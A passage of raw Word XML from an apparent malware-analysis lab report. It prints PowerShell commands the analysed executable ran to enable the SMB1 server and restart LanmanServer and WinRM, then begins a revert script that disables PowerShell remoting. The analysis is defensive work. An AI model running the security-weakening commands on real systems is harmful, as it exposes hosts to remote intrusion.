      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NoRestart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="54085329" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WindowsOptionalFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Online -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FeatureName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB1Protocol-Server -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NoRestart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5E6B352B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters" -Name SMB1 -Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DWord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value 1 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="51E39454" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Restart-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="22BE2EF6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Restart-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="751C620A" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5CEA0F32" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Often processes execution analysis, system configuration changes, persistence mechanisms, new or modified files, and network connections are indicators of compromise for malicious activities within a system. Retrieving full malware capabilities as shown above is critical in reversing and unauthorized alterations to a system, though not always feasible. Reverse Engineering of payload is crucial so a next step would be to isolate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder and the PowerShellApp.exe for further analysis. But for this example, we will proceed to reverse configuration changes, consider the prevention of the execution of scripts, and consider modifying permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4FB13F45" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2C17FA87" w14:textId="1B3254B6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890128" w:id="12"/>
      <w:r>
        <w:t>3.5.3 Reverse Execution Changes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="121F54E1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="762B2385" w14:textId="18828B89">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the following script as a .ps1 or copy and paste into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>PowerShell terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> line of the victim machine. This will reverse the changes found in the executable above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6FFE8A3E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="130A6024" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t># REVERT SCRIPT: Restores system state after ART/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1017030C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5DDC9F27" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ProgressPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="73D2730E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6B94E2C2" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t># Reset network profile to Public</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="49CC2449" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NetConnectionProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>NetworkCategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Public -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3798EF71" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0126A39D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#  Disable PowerShell Remoting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="425F5E2E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Disable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>PSRemoting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5FACE1A1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0658B768" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Disable Unencrypted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1480C310" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Item </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
